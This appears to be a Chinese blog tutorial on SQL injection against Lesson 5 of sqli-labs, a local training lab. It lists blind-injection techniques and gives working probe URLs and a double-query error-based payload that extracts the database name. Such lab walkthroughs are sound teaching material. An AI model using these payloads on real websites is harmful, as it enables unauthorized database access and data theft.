sqli-labs第五关sql注入流程

正常访问

http://127.0.0.1/sqli-labs-master/less-5/?id=1

判断注入类型

http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2

根据报错可以知道是字符注入,使用 ' 进行闭合。

通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。

所以这关的重点是盲注。

http://127.0.0.1/sqli-labs-master/less-5/?id=-1'  %23

 

 盲注分为三类:

        •基于布尔 SQL 盲注

        •基于时间的 SQL 盲注

        •基于报错的 SQL 盲注

                1.双查询注入  原理链接

                2.使用exp注入(版本在 5.5.5 及其以上)原理链接

                3.使用bigint注入(版本在 5.5.5 及其以上)原理链接

                4.extractvalue函数错误 

                5.updatexml函数错误 

                6.mysql 重复特性

手动注入个人倾向于用基于报错的SQL盲注,这关用的也是这种。

开始注入

        1.双查询注入(需要多点几下才能出效果)

        爆库名

http://127.0.0.1/sqli-labs-master/less-5/?id=1' union select 1, count(*), concat((select database()), floor(rand()*2)) a from information_schema.tables group by a  %23

  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值